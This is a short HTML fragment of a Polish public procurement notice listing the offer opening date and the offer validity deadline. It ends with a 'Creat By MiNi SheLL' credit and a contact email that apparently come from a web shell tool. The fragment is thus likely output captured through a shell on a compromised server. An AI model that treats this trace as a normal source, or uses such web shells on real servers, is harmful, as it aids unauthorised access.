https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-19 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-10-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com